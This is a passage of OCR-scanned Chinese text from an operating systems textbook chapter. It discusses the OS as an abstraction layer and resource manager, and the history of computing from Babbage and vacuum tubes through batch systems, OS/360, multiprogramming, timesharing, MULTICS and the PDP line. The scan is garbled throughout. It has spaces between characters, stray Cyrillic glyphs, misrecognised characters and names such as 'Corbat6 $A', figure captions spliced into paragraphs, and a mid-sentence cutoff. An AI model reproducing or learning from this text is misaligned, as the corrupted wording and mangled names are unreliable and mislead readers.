抽象 是 管理 复杂 性 的 一 个 关键 。 好 的 抽象 可 以 把 一 个 几乎 不 可 能 管理 的 任务 划分 为 两 个 可 管理 的 部 
分 。 其 第 一 部 分 是 有 关 抽象 的 定义 和 实现 ， 第 二 部 分 是 随时 用 这 些 抽象 解决 问题 。 几 乎 每 个 计算 机 用 户 
都 理解 的 一 个 抽象 是 文件 。 文 件 是 一 种 有 效 的 信息 片段 ， 诸 如 数码 照片 、 保 存 的 电子 邮件 信息 或 Web 页 
面 等 。 处 理 数码 照片 、 电 子 邮件 以 及 Web 页 面 等 ， 要 比 处 理 磁盘 的 细节 容易 ， 这 些 磁 盘 的 具体 细节 与 前 
面 叙述 过 的 软盘 一 样 。 操 作 系统 的 任务 是 创建 好 的 抽象 ， 并 实现 和 管理 它 所 创建 的 抽象 对 象 。 本 书 中 ， 
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我 们 将 研究 许多 关于 抽象 的 内 容 ， 因 为 这 是 理解 操作 系统 的 关键 。 

上 述 观 点 是 非常 重要 的 ， 所 以 值得 用 不 同 的 表述 语句 来 再 次 叙述 。 怀 着 对 设计 Macintosh 机 器 的 工业 
设计 师 的 尊重 ， 作 者 这 里 不 得 不 说 ， 硬 件 是 丑陋 的 。 е: 
真实 的 处 理 器 、 内 存 条 、 磁 盘 和 其 他 装置 都 是 非常 应 用 程序 
复杂 的 ， 对 于 那些 为 使 用 某 个 硬件 而 不 得 不 编写 软 ЖЯ 
件 的 人 们 而 言 ， 他 们 使 用 的 是 困难 、 可 怕 、 特 殊 和 
不 一 致 的 接口 。 有 时 这 是 由 于 需要 兼容 旧 的 硬件 
有 时 是 为 了 节省 成 本 ， 但 是 ， 有 时 硬件 设计 师 们 并 
没有 意识 到 (REE) 他 们 给 软件 设计 带 来 了 多 大 
的 麻烦 。 操 作 系统 的 一 个 主要 任务 是 隐藏 硬件 ， 呈 
现 给 程序 (以 及 程序 员 ) 良好 、 清 晰 、 优 雅 、 一 致 
的 抽象 。 如 图 1-2 所 示 ， 操 作 系统 将 丑陋 转变 为 美丽 。 д 
其 抽象 打交道 。 相 反 ， 最 终 用 户 与 用 户 接口 所 提供 的 抽象 打交道 ， 或 者 是 命令 行 shell 或 者 是 图 形 接口 。 
而 用 户 接口 的 抽象 可 以 与 操作 系统 提供 的 抽象 类 似 ， 但 也 不 总 是 这 样 。 为 了 更 清晰 地 说 明 这 一 点 ， 请 读 
者 考虑 普通 的 Windows 桌 面 以 及 面向 行 的 命令 提示 符 。 两 者 都 是 运行 在 Windows 操 作 系统 上 的 程序 ， 并 
使 用 了 Windows 提 供 的 抽象 ， 但 是 它们 提供 了 非常 不 同 的 用 户 接口 。 类 似 地 ， 运 行 Gnome 或 者 KDE 的 
Linux 用 户 与 直接 在 X Window 系 统 (面向 文本 ) 顶部 工作 的 Linux 用 户 看 到 的 是 非常 不 同 的 界面 ， 但 是 
在 这 两 种 情形 中 ， 操 作 系 统 下 面 的 抽象 是 相同 的 。 

在 本 书 中 ， 我 们 将 具体 讨论 提供 给 应 用 程序 的 抽象 ， 不 过 很 少 涉及 用 户 界面 。 尽 管用 户 界面 是 一 个 
巨大 和 重要 的 课题 ， 但 是 它们 毕竟 只 和 操作 系统 的 外 围 相 关 。 


11.2 作为 资源 管理 者 的 操作 系统 

把 操作 系统 看 作 是 向 应 用 程序 提供 基本 抽象 的 概念 ， 是 一 种 自 顶 向 下 的 观点 。 按 照 另 一 种 自 底 向 上 
的 观 操作 系统 则 用 来 管理 一 个 复杂 系统 的 各 个 部 分 。 现 代 计算 机 包含 处 理 器 、 存 储 器 、 时 钟 、 磁 盘 
了 鼠标、 网 络 接 口 、 打 印 机 以 及 许多 其 他 设备 。 从 这 个 角度 看 ， 操 作 系统 的 任务 是 在 相互 竞争 的 程序 之 间 
有 序 地 控制 对 处 理 器 、 存 储 器 以 及 其 他 IO 接口 设备 的 分 配 

现代 操作 系统 允许 同时 运行 多 道 程序 。 假 设 在 一 台 计算 机 上 运行 的 三 个 程序 试图 同时 在 同一 台 打印 
机 上 输出 计算 结果 ， 那 么 开始 的 几 行 可 能 是 程序 1 的 输出 ， 接 着 几 行 是 程序 2 的 输出 ， 然 后 又 是 程序 3 的 
输出 等 ， 最 终结 果 将 是 一 团 精 。 采 用 将 打印 结果 送 到 磁盘 上 缓冲 区 的 方法 ， 操 作 系统 可 以 把 漠 在 的 混乱 
有 序 化 。 在 一 个 程序 结束 后 ， 操 作 系统 可 以 将 暂 存在 磁盘 上 的 文件 送 到 打印 机 输出 ， 同 时 其 他 程序 可 以 
继续 产生 更 多 的 输出 结果 ， 很 明显 ， 这 些 程序 的 输出 还 没有 真正 送 至 打印 机 。 

当 一 个 计算 机 (或 网 络 ) 有 多 个 用 户 时 ， 管 理 和 保护 存储 器 、IO 设 备 以 及 其 他 资源 的 需求 变 得 强 
烈 起 来 ， 因 为 用 户 间 可 能 会 互相 干扰 。 另 外 ， 用 户 通常 不 仅 共享 硬件 ,还 要 共享 信息 (文件 、 数据库 等 )。 
简 而 言 之 ， 操 作 系统 的 这 一 种 观点 认为 ， 操 作 系统 的 主要 任务 是 记录 哪个 程序 在 使 用 什么 资源 ， 对 资源 
请 求 进行 分 配 ， 评 估 使 用 代价 ， 并 且 为 不 同 的 程序 和 用 户 调解 互相 冲突 的 资源 请 求 。 

资源 管理 包括 用 以 下 两 种 不 同方 式 实现 多 路 复 用 (共享 ) 资源 ,在 时 间 上 复 用 和 在 空间 上 复 用 。 当 
-种 资源 在 时 间 上 复 用 时 ， 不 同 的 程序 或 用 户 轮流 使 用 它 。 先 是 第 一 个 获得 资源 的 使 用 ， 然 后 下 一 个 
以 此 类 推 。 例 如 ， 若 在 系统 中 只 有 一 个 CPU， 而 多 个 程序 需要 在 该 CPU 上 运行 ， 操 作 系统 则 首先 把 该 
CPU 分 配给 某 一 个 程序 ， 在 它 运行 了 足够 长 的 时 间 之 后 ， 另 一 个 程序 得 到 CPU， 然 后 是 下 一 个 ， 如 此 进 
行 下 去 ， 最 终 ， 轮 到 第 一 个 程序 再 次 运行 。 至 于 资源 是 如 何 实现 时 间 复 用 的 一 _ 谁 应 该 是 下 一 个 以 及 运 
行 多 长 时 间 等 一 一 则 是 操作 系统 的 任务 。 还 有 一 个 有 关 时 间 复 用 的 例子 是 打印 机 的 共享 。 当 多 个 打印 作 
业 在 一 台 打印 机 上 排队 等 待 打印 时 ， 必 须 决定 将 轮 到 打印 的 是 哪个 作业 。 

另 一 类 复 用 是 空间 复 用 。 每 个 客户 都 得 到 资源 的 一 部 分 ， 从 而 取代 了 客户 排队 。 例 如 ， 通 常 在 若干 
运行 程序 之 间 分 割 内 存 ， 这 样 每 一 个 运行 程序 都 可 同时 人 住 内 存 〈 例 如， 为 了 轮流 使 用 CPU)。 假 设 有 
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足够 的 内 存 可 以 存放 多 个 程序 ， 那 么 在 内 存 中 同时 存放 若干 个 程序 的 效率 ， 比 把 所 有 内 存 都 分 给 一 个 程 
序 的 效率 要 高 得 多 ， 特 别 是 ， 如 果 一 个 程序 只 需要 整个 内 存 的 一 小 部 分 时 ， 结 果 更 是 这 样 。 当 然 ， 如 此 
的 做 法 会 引起 公平 、 保 护 等 问题 ,这 有 赖 于 操作 系统 解决 它们 。 有 关 空 间 复 用 的 其 他 资源 还 有 磁盘 。 在 
许多 系统 中 ， 一 个 磁盘 同时 为 许多 用 户 保存 文件 。 分 配 磁盘 空间 并 记录 谁 正在 使 用 哪个 磁盘 块 ， 是 操作 
系统 资源 管理 的 典型 任务 。 
1.2 操作 系统 的 历史 

操作 系统 已 经 存在 许多 年 了 。 在 下 面 的 小 节 中 , 我 们 将 简要 地 分 析 一 些 操作 系统 历史 上 的 重要 之 处 。 
操作 系统 与 其 所 运行 的 计算 机 体系 结构 的 联系 非常 密切 。 我 们 将 分 析 连 续 几 代 的 计算 机 ， 看 看 它们 的 操 
作 系统 是 什么 样 的 。 把 操作 系统 的 分 代 映 射 到 计算 机 的 分 代 上 有 些 粗糙 ， 但 是 这 样 做 确实 有 某 些 作用 ， 
否则 还 没有 其 他 好 办 法 能 够 说 清楚 操作 系统 的 历史 。 

下 面 给 出 的 有 关 操作 系统 的 发 展 主要 是 按照 时 间 线索 叙述 的 ， 且 在 时 间 上 是 有 重 颂 的。 每 个 发 展 并 
不 是 等 到 先前 一 种 发 展 完成 后 才 开 始 。 存 在 着 大 量 的 重 又 ,不 用 说 还 存在 有 不 少 虚 假 的 开始 和 终结 时 间 。 
请 读者 把 这 里 的 文字 叙述 看 成 是 一 种 指引 ， 而 不 是 盖 棺 论 定 。 

第 一 台 真正 的 数字 计算 机 是 英国 数学 家 Charles Babbage (1792—1871) 设计 的 。 尽 管 Babbage 花 费 
了 他 几乎 一 生 的 时 间 和 财产 ， 试 图 建造 他 的 “分 析 机 ”"， 但 是 他 始终 未 能 让 机 器 正常 的 运转 ， 因 为 它 是 
一 台 纯 机 械 的 数字 计算 机 ， 他 所 在 时 代 的 技术 不 能 生产 出 他 所 需要 的 高 精度 轮子 、 齿 轮 和 轮 牙 。 毫 无 疑 
间 ， 这 台 分 析 机 没有 操作 系统 。 

有 一 段 有 趣 的 历史 花架 ，Babbage 认 识 到 他 的 分 析 机 需要 软件 ， 所 以 他 雇佣 了 一 个 名 为 Ada 
Lovelace 的 年 轻 妇 女 ， 作 为 世界 上 第 一 个 程序 员 ， 而 她 是 著名 的 英国 诗人 Lord Byron 的 女儿 。 程 序 设计 
语言 Ada 则 是 以 她 命名 的 。 


1.2.1 第 一 代 (1945~1955): 真空 管 和 穿孔 卡片 

从 Babbage 失败 之 后 一 直到 第 二 次 世界 大 战 ， 数 字 计 算 机 的 建造 几乎 没有 什么 进展 ， 第 二 次 世界 大 
战 刺激 了 有 关 计算 机 研究 的 爆炸 性 开展 。Iowa 州 立 大 学 的 John Atanasoff 教 授 和 他 的 学 生 Clifford Berry 
建造 了 据 认为 是 第 一 台 可 工作 的 数字 计算 机 。 该 机 器 使 用 了 300 个 真空 管 。 大 约 在 同时 ，Konrad Zuse 在 
柏林 用 继电器 构建 了 Z3 计 算 机 ， 英 格 兰 布 莱 切 利 园 的 一 个 小 组 在 1944 年 构建 了 Colossus，Howard Aiken 
在 哈佛 大 学 建造 了 Mark 【[， 宾 夕 法 尼 亚 大 学 的 William Mauchiey 和 他 的 学 生 J.Presper Eckert 建 造 了 
ENIAC。 这 些 机 器 有 的 是 二 进 制 的 ， 有 的 使 用 真空 管 ， 有 的 是 可 编程 的 ， 但 是 都 非常 原始 ， 其 至 需要 花 
费 数秒 时 间 才能 完成 最 简单 的 运算 。 

在 那个 早期 年 代 里 ， 同 一 个 小 组 的 人 (通常 是 工程 师 们 ) 设计 、 建 造 、 编 程 、 操 作 并 维护 一 台 机 器 。 
所 有 的 程序 设计 是 用 纯粹 的 机 器 语言 编写 的 ， 其 至 更 精 烂 ， 需 要 通过 将 上 千 根 电缆 接 到 插件 板 上 连接 成 
电路 ， 以 便 控制 机 器 的 基本 功能 。 没 有 程序 设计 语言 (甚至 汇编 语言 也 没有 ) ， 操 作 系统 则 从 来 没有 听 
说 过 。 使 用 机 器 的 一 般 方式 是 ， 程 序 员 在 墙 上 的 机 时 表 上 预约 一 段 时 间 ， 然 后 到 机 房 中 将 他 的 插件 板 接 
到 计算 机 里 ， 在 接 下 来 的 儿 小 时 里 ， 期 盼 正在 运行 中 的 两 万 多 个 真空 管 不 会 烧 坏 。 那 时 ， 所 有 的 计算 问 
题 实 际 都 只 是 简单 的 数字 运算 ， 如 制作 正弦 、 余 弦 以 及 对 数 表 等 。 

到 了 20 世 纪 50 年 代 早期 有 了 改进 ， 出 现 了 穿孔 卡片 ， 这 时 就 可 以 将 程序 写 在 卡片 上 ， 然 后 读 入 计算 
机 而 不 用 插件 板 ， 但 其 他 过 程 则 依然 如 旧 


1.2.2 第 二 代 (1955~1965) 晶体 管 和 批 处 理 系 统 

20 世 纪 50 年 代 晶体 管 的 发 明 极 大 地 改变 了 整个 状况 。 计 算 机 已 经 很 可 靠 ， 厂 商 可 以 成 批 地 生产 并 销 
售 计算 机 给 用 户 ， 用 户 可 以 指望 计算 机 长 时 间 运 行 ， 完 成 一 些 有 用 的 工作 。 此 时 ， 设 计 人 员 、 生 产 人 员 、 
操作 人 员 、 程 序 人 员 和 维护 人 员 之 间 第 一 次 有 了 明确 的 分 工 。 

这 些 机 器 ， 现 在 被 称 作 大 型 机 (mainframe) ， 锁 在 有 专用 空调 的 房间 中 ， 由 专业 操作 人 员 运行 。 只 
有 少数 大 公司 、 重 要 的 政府 部 门 或 大 学 才 接受 数 百 万 美元 的 标价 。 要 运行 一 个 作业 (job， 即 一 个 或 一 
组 程序 ) ， 程 序 员 首 先 将 程序 写 在 纸 上 (用 FORTRAN 语 言 或 汇编 语言 )， 然 后 穿孔 成 卡片 ， 再 将 卡片 食 
带 到 输入 室 ， 交 给 操作 员 ， 接 着 就 喝 咖啡 直到 答 出 完成 。 
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计算 机 运行 完 当前 的 任务 后 ， 其 计算 结果 从 打印 机 上 输出 ， 操 作 员 到 打印 机 上 撕 下 运算 结果 并 送 到 
输出 室 ， 程 序 员 稍 后 就 可 取 到 结果 。 然 后 ， 操 作 员 从 已 送 到 输入 室 的 卡片 盒 中 读 入 另 一 个 任务 。 如 果 需 
要 FORTRAN 编 译 器 ， 操 作 员 还 要 从 文件 柜 把 它 取 来 读 入 计算 机 。 当 操作 员 在 机 房 里 走 来 走 去 时 许多 机 
时 被 浪费 掉 了 。 

由 于 当时 的 计算 机 非常 昂贵 ， 人 们 很 自然 地 要 想 办 法 减少 机 时 的 浪费 。 通 常 采用 的 解决 方法 就 是 批 
处 理 系统 (batch system), EUWE: 在 输入 室 收集 全 部 的 作业 ， 然 后 用 一 台 相对 便宜 的 计算 机 ， 如 
ІВМ 1401 计 算 机 ， 将 它们 读 到 磁带 上 。IBM 1401 计 算 机 适用 于 读 卡片 、 复 制 磁带 和 输出 打印 ， 但 不 适 
用 于 数值 运算 。 另 外 用 较 昂 贵 的 计算 机 ， 如 IBM 7094 来 完成 真正 的 计算 。 这 些 情况 如 图 1-3 所 示 。 
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图 1-3 一 种 早期 的 批 处 理 系统 : а) 程序 员 将 卡片 拿 到 1401 机 处 ，b) 1401 机 将 批 处 理 作业 读 到 磁带 上 ， 
©) 操作 员 将 输入 带 送 至 7094 机 ，d) 7094 机 进行 计算 ，e) 操作 员 将 输出 磁带 送 到 1401 机 ，9 1401 机 打印 输出 


在 收集 了 大 约 一 个 小 时 的 批量 作业 之 后 ， 这 些 卡片 被 读 进 磁带 ， 然 后 磁带 被 送 到 机 房 里 并 装 到 磁带 
机 上 。 随 后 ， 操 作 员 装 入 一 个 特殊 的 程序 (现代 操作 系统 的 前 身 ) ， 它 从 磁带 上 读 人 第 一 个 作业 并 运行 ， 
其 输出 写 到 第 二 盘 磁带 上 ， 而 不 打印 。 每 个 作业 结束 后 ， 操 作 系统 自动 地 从 磁带 上 读 入 下 一 个 作业 并 运 
行 。 当 一 批 作业 完全 结束 后 ， 操 作 员 取 下 输入 和 输出 磁带 ， 将 输入 磁带 换 成 下 一 批 作业 ， 并 把 输出 磁带 
拿 到 一 台 1401 机 器 上 进行 脱 机 (不 与 主 计算 机 联机 ) 打印 。 

典型 的 输入 作业 结构 如 图 1-4 所 示 。 一 开始 是 张 SJOB 卡 片 ， 它 标识 出 所 需 的 最 大 运行 时 间 (以 分 钟 
为 单位 ) 、 计 费 账号 以 及 程序 员 的 名 字 。 接 着 是 SFORTRAN 卡 片 ， 通 知 操作 系统 从 系统 磁带 上 装 人 
FORTRAN 语 言 编译 器 。 之 后 就 是 待 编译 的 源 程序 ， 然 后 是 SLOAD 卡 片 ， 通 知 操作 系统 装 人 编译 好 的 目 
标 程序 。 接 着 是 SRUN 卡 片 ， 告 诉 操作 系统 运行 该 程序 并 使 用 随后 的 数据 。 最 后 ，SEND 卡 片 标识 作业 结 
东 。 这 些 基本 的 控制 卡片 是 现代 shell 和 命令 解释 器 的 先驱 。 
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图 1-4 典型 的 FMS 作 业 结构 


第 二 代 大 型 计算 机 主要 用 于 科学 与 工程 计算 ， 例 如 ， 解 偏 微分 方程 。 这 些 题 目 大 多 用 FORTRAN 语 
言 和 汇编 语言 编写 。 典 型 的 操作 系统 是 EMS (FORTRAN Monitor System，FORTRAN 监 控 系 统 ) 和 
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IBSYS (IBM 为 7094 机 配备 的 操作 系统 ) 。 


1.2.3 第 三 代 (1965~ 1980) :集成 电路 芯片 和 多 道 程序 设计 

20 世 纪 60 年 代 初期 ， 大 多 数 计算 机 厂商 都 有 两 条 不 同 并 且 完 全 不 兼容 的 生产 线 。 一 条 是 面向 字 的 、 
大 型 的 科学 用 计算 机 ， 诸 如 IBM 7094， 主 要 用 于 科学 和 工程 计算 。 另 一 条 是 面向 字符 的 、 商 用 计算 机 ， 
诸如 IBM 1401， 银 行 和 保险 公司 主要 用 它 从 事 磁带 归档 和 打印 服务 。 

开发 和 维护 两 种 完全 不 同 的 产品 ， 对 厂商 来 说 是 昂贵 的 。 另 外 ， 许 多 新 的 计算 机 用 户 一 开始 时 只 需 
要 一 台 小 计算 机 ， 后 来 可 能 又 需要 一 台 较 大 的 计算 机 ， 而 且 和 希望 能 够 更 快 地 执行 原 有 的 程序 。 

IBM 公 司 试图 通过 引入 System/360 来 一 次 性 地 解决 这 两 个 问题 。360 是 一 个 软件 兼容 的 计算 机 系列 ， 
其 低档 机 与 1401 相 当 ， 高 档 机 则 比 7094 功 能 强 很 多 。 这 些 计算 机 只 在 价格 和 性 能 (最 大 存储 器 容量 、 处 
理 器 速度 、 人 允许 的 MO 设备 数量 等 ) 上 有 差异 。 由 于 所 有 的 计算 机 都 有 相同 的 体系 结构 和 指令 集 ， 因 此 ， 
在 理论 上 ， 为 一 种 型 号 机 器 编写 的 程序 可 以 在 其 他 所 有 型 号 的 机 器 上 运行 。 而 且 360 被 设计 成 既 可 用 于 
科学 计算 ,又 可 用 于 商业 计算 , 这样， 一 个 系列 的 计算 机 便 可 以 满足 所 有 用 户 的 要 求 。 在 随后 的 几 年 里 ， 
IBM 使 用 更 现代 的 技术 陆续 推出 了 360 的 后 续 机 型 ， 如 著名 的 370、4300、3080 和 3090 系 列 。zSeries 是 这 
个 系列 的 最 新 机 型 ， 不 过 它 与 早期 的 机 型 相 比 变化 非常 之 大 。 

360 是 第 一 个 采用 (小 规模 ) 芯片 《集成 电路 ) 的 主流 机 型 ， 与 采用 分 立 晶 体 管制 造 的 第 二 代 计算 
机 相 比 ， 其 性 能 /价格 比 有 很 大 提高 。360 很 快 就 获得 了 成 功 ， 其 他 主要 厂商 也 很 快 采纳 了 系列 兼容 机 的 
思想 。 这 些 计算 机 的 后 代 仍 在 大 型 的 计算 中 心里 使 用 。 现 在 ， 这 些 计算 机 的 后 代 经 常用 来 管理 大 型 数据 
库 (如 航班 定 票 系统 ) 或 作为 web 站 点 的 服务 器 ， 这 些 服务 器 每 秒 必须 处 理 数 千 次 的 请 求 。 

“单一 家 族 ” 思 想 的 最 大 优点 同时 也 是 其 最 大 的 缺点 。 原 因 在 于 所 有 的 软件 ， 包 括 操作 系统 OS/360， 
要 能 够 在 所 有 机 器 上 运行 。 从 小 的 代替 1401 把 卡片 复制 到 磁带 上 的 机 器 ， 到 用 于 代 赫 7094 进 行 气象 预报 
及 其 他 繁重 计算 的 大 型 机 ， 从 只 能 带 很 少 外 部 设备 的 机 器 到 有 很 多 外 设 的 机 器 ， 从 商业 领域 到 科学 计算 
领域 等 。 总 之 ， 它 要 有 效 地 适用 于 所 有 这 些 不 同 的 用 途 。 

IBM (或 其 他 公司 ) 无 法 写 出 同时 满足 这 些 相互 冲突 需要 的 软件 。 其 结果 是 一 个 庞大 的 又 极其 复杂 
的 操作 系统 ， 它 比 FMS 大 了 约 2 一 3 个 数量 级 规模 。 其 中 包含 数 千 名 程序 员 写 的 数 百 万 行 汇 编 语 言 代码 ， 
也 包含 成 千 上 万 处 错误 ， 这 就 导致 IBM 不 断 地 发 行 新 的 版 本 试图 更 正 这 些 错误 。 每 个 新 版 本 在 修正 老 错 
误 的 同时 又 引入 了 新 错误 ， 所 以 随 着 时 间 的 流逝 ， 错 误 的 数量 可 能 大 致 保持 不 变 。 

OS/360 的 设计 者 之 一 Fred Brooks 后 来 写 过 一 本 既 该 谐 又 尖锐 的 书 (Brooks, 1996) ， 描 述 他 在 开发 
OS/360 过 程 中 的 经 验 。 我 们 不 可 能 在 这 里 复述 该 书 的 全 部 内 容 ， 不 过 其 封面 已 经 充分 表述 了 Fred Brooks 
的 观点 ， 一 群 史前 动物 陷入 泥潭 而 不 能 自拔 。Silberschatz 等 人 著作 (2005) 的 封面 也 表达 了 操作 系统 如 
同 恐 龙 一 般 的 类 似 观点 。 

抛 开 0S/360 的 庞大 和 存在 的 问题 ，OS/360 和 其 他 公司 类 似 的 第 三 代 操作 系统 的 确 合理 地 满足 了 大 
多 数 用 户 的 要 求 。 同 时 ， 它 们 也 使 第 二 代 操 作 系统 所 缺乏 的 几 项 关键 技术 得 到 了 广泛 应 用 。 其 中 最 重要 
的 应 该 是 多 道 程 序 设计 (multiprogramming)。 在 7094 机 上 ， 若 当前 作业 
因 等 待 磁带 或 其 他 IO 操作 而 暂停 时 ，CPU 就 只 能 简单 地 踏步 直至 该 UO 完 
成 。 对 于 CPU 操作 密集 的 科学 计算 问题 ，LO 操 作 较 少 ， 因 此 浪费 的 时 间 
很 少 。 然而 ,对 于 商业 数据 处 理 ，1/O 操 作 等 待 的 时 间 通 常 占 到 80% — 90%, 
所 以 必须 采取 某 种 措施 减少 (昂贵 的 ) CPU 空闲 时 间 的 浪费 。 

解决 方案 是 将 内 存 分 几 个 部 分 ， 每 一 部 分 存放 不 同 的 作业 ， 如 图 1-5 
所 示 。 当 一 个 作业 等 待 O 操 作 完成 时 ， 另 一 个 作业 可 以 使 用 CPU。 如 果 
内 存 中 可 以 同时 存放 足够 多 的 作业 ， 则 CPU 利用 率 可 以 接近 100% 。 在 内 图 1-5 一 个 内 存 中 有 三 个 作 
存 中 同时 驻 留 多 个 作业 需要 特殊 的 硬件 来 对 其 进行 保护 ， 以 避免 作业 的 信 业 的 多 道 程序 系统 
息 被 窃取 或 受到 攻击 。360 及 其 他 第 三 代 计 算 机 都 配 有 此 类 硬件 。 

第 三 代 计算 机 的 另 一 个 特性 是 ， 卡 片 被 拿 到 机 房 后 能 够 很 快 地 将 作业 从 卡片 读 和 磁盘。 于是， 任何 
时 刻 当 一 个 作业 运行 结束 时 ， 操 作 系 统 就 能 将 一 个 新 作业 从 磁盘 读 出 ， 装 进 空 出 来 的 内 存 区 域 运行 。 这 
种 技术 叫做 同时 的 外 部 设备 联机 操作 (Simultaneous Peripheral Operation On Line, SPOOLing ), 18% 


内 存 
分 区 
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术 同时 也 用 于 输出 。 当 采用 了 SPOOLing 技 术 后 ， 就 不 再 需要 IBM 1401 机 ， 也 不 必 再 将 磁带 搬 来 搬 去 了 。 

第 三 代 操 作 系统 很 适 于 大 型 科学 计算 和 繁忙 的 商务 数据 处 理 ， 但 其 实质 上 仍旧 是 批 处 理 系统 。 许 多 
程序 员 很 怀念 第 一 代 计算 机 的 使 用 方式 。 那 时 ， 他 们 可 以 几 个 小 时 地 独占 一 台 机 器 ， 可 以 即时 地 调试 他 
们 的 程序 。 而 对 第 三 代 计算 机 而 言 ， 从 一 个 作业 提交 到 运算 结果 取 回 往往 长 达 数 小 时 ， 更 有 其 者 ,一 个 
逗号 的 误 用 就 会 导致 编译 失败 ， 而 可 能 浪费 了 程序 员 半天 的 时 间 。 

程序 员 们 的 希望 很 快 得 到 了 响应 ， 这 种 需求 导致 了 分 时 系统 (timesharing) 的 出 现 。 它 实际 上 是 多 
道 程序 的 一 个 变 体 ， 每 个 用 户 都 有 一 个 联机 终端 。 在 分 时 系统 中 ， 假 设 有 20 个 用 户 登 录 ， 其 中 17 个 在 思 
考 、 谈 论 或 喝 咖 啡 ， 则 CPU 可 分 配给 其 他 三 个 需要 的 作业 轮流 执行 。 由 于 调试 程序 的 用 户 常常 只 发 出 简 
短 的 命令 (如 编译 一 个 五 页 的 源 文件 ) ， 而 很 少 有 长 的 费时 命令 (如 上 百 万 条 记录 的 文件 排序 )， 所 以 计 
算 机 能 够 为 许多 用 户 提供 快速 的 交互 式 服务 ， 同时 在 CPU 空闲 时 还 可 能 在 后 台 运 行 一 个 大 作业 。 第 一 个 
通用 的 分 时 系统 ， 羔 容 分 时 系统 (Compatible Time Sharing System，CTSS) 是 MIT ( 麻 省 理工 学 院 ) 在 
一 台 改 装 过 的 7094 机 上 开发 成 功 的 (Corbat6 $A, 1962 年 )。 但 直到 第 三 代 计算 机 广泛 采用 了 必需 的 保 
护 硬件 之 后 ， 分 时 系统 才 逐 渐 流行 开 来 。 

在 CTSS 成 功 研制 之 后 ，MIT、 贝尔 实验 室 和 通用 电气 公司 (СЕ, 当时 一 个 主要 的 计算 机 制造 厂商 ) 
决定 开发 一 种 “公用 计算 服务 系统 "， 能 够 同时 支持 数 百名 分 时 用 户 的 一 种 机 器 。 它 的 模型 借鉴 了 供电 
系统 一 一 当 需 要 电能 时 ， 只 需 将 电气 设备 接 到 墙 上 的 插座 即 可 ， 于 是 ， 在 合理 范围 内 ， 所 需要 的 电能 随 
时 可 提供 。 该 系统 称 作 MULTICS (MULTiplexed Information and Computing Service )， 其 设计 者 着 眼 
于 建造 满足 波士顿 地 区 所 有 用 户 计算 需求 的 一 台 机 器 。 在 当时 看 来 ， 仅 仅 40 年 之 后 ， 就 能 成 百 万 台地 销 
E (价值 不 到 1 千 美元 ) 速度 是 GE-645 主 机 10 000 倍 的 计算 机 ， 完 全 是 科学 幻想 。 这 种 想法 同 现在 关于 
穿越 大 西洋 的 超 音速 海底 列车 的 想法 一 样 ， 是 幻想 。 

MULTICS 得 到 一 种 混合 式 的 成 功 。 尽管 这 台 机 器 具有 较 强 的 1/O 能 力 ， 却 要 在 一 台 仅仅 比 Intel 386 
PC 性 能 强 一 点 的 机 器 上 支持 数 百 个 用 户 。 可 是 这 个 想法 并 不 像 表面 上 那么 东 唐 ， 因为 那 时 的 人 们 已 经 知 
道 如 何 编写 精练 的 高 效 程序 ， 而 这 种 技巧 随后 逐渐 丢失 了 。 有 许多 原因 造成 MULTICS 没 有 能 够 普及 到 
全 世界 ， 至 少 它 不 应 该 采用 PL/1 编 写 , 因为 PL/1 编 译 器 推迟 了 好 几 年 才 完 成 ， 好 不 容易 完成 的 编译 器 又 
极 少 能 够 成 功 运行 。 另 外 ， 当时 的 MULTICS 有 太 大 的 野心 ， 犹如 19 世 纪 中 期 Charles Babbage 的 分 析 机 。 

简要 地 说 ， MULTICS 在 计算 机 文献 中 播 搬 了 许多 原创 的 概念 ， 但 要 将 其 造成 一 台 真正 的 机 器 并 想 
实现 商业 上 的 巨大 成 功 的 研制 难度 超出 了 所 有 人 的 预料 。 贝尔 实验 室 退 出 了 ， 通 用 电气 公司 也 退出 了 计 
算 机 领域 。 但 是 M.I.T. 坚 持 下 来 并 且 最 终 使 MULTICS 成 功 运行 。 MULTICS 最 后 成 为 商业 产品 ， 由 购买 
了 通用 电气 公司 计算 机 业务 的 公司 (Honeywell) 销售 ， 并 安装 在 世界 各 地 80 多 个 大 型 公司 和 大 学 中 。 
尽管 MULTICS 的 数量 很 小 ， 但 是 MULTICS 的 用 户 们 却 非常 忠诚 ， 例 如 ， 通用 汽车 、 福 特 和 美国 国家 安 
全 局 直到 20 世 纪 90 年 代 后 期 ， 在 试图 让 Honeywell 更 新 其 硬件 多 年 之 后 ， 才 关 闭 了 他 们 的 MULTICS 系 统 ， 
而 这 已 经 是 在 MULTICS 推 出 之 后 30 年 了 。 

目前 ， 计 算 服务 的 概念 已 经 被 遗弃 ， 但 是 这 个 概念 是 可 以 回归 的 ， 以 大 量 的 、 附 有 相对 简单 用 户 机 
器 的 、 集 中 式 Internet 服 务 器 形式 回归 。 在 这 种 形式 中 ， 主要 工作 在 大 型 服务 器 上 完成 。 而 回归 的 动机 可 
能 是 多 数 人 不 愿意 管理 日 益 过 分 复杂 的 计算 机 系统 ， 宁可 让 那些 运行 服务 器 公司 的 专业 团队 去 做 。 电子 
商务 已 经 向 这 个 方向 演化 了 ， 各 种 公司 在 多 处 理 器 的 服务 器 上 经 营 各 自 的 电子 商场 ， 简单 的 客户 端 连接 
着 多 处 理 器 服务 器 ， 这 同 MULTICS 的 设计 精神 非常 类 似 。 

尽管 MULTICS 在 商业 上 失败 了 ， 但 MULTICS 对 随后 的 操作 系统 却 有 着 巨大 的 影响 ， 详情 请 参阅 有 
关 文献 和 书籍 (Corbat6 等 人 ，1972，Corbat6 和 Vyssotsky，1965， Daley 和 Dennis, 1968, Organick, 
1972，Saltzer，1974)。 还 有 一 个 曾经 (现在 仍然 ) 活跃 的 Web 站 点 www.multicians.org， 上 面 有 大 量 关 
于 系统 、 设 计 人 人 员 以 及 其 用 户 的 信息 资料 。 

另 一 个 第 三 代 计 算 机 的 主要 进展 是 小 型 机 的 巾 起 ， 以 1961 年 DEC 的 PDP-1 作 为 起 点 。PDP-1 计 算 机 
只 有 4K 个 18 位 的 内 存 ， 每 台 售 价 120 000 美 元 (不 到 IBM 7094 的 5%) ， 该 机 型 非常 热 销 。 对 于 某 些 非 数 
值 的 计算 ， 它 和 7094 几 乎 一 样 快 。PDP-1 开 辟 了 一 个 全 新 的 产业 。 很 快 有 了 一 系列 PDP 机 型 (与 IBM 系 
列 机 不 同 ， 它 们 互 不 兼容 ) , 其 顶峰 为 PDP-11。 
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一 位 曾 参加 过 MULTICS 研 制 的 贝尔 实验 室 计算 机 科学 家 Ken Thompson， 后 来 找到 一 台 无 人 使 用 的 
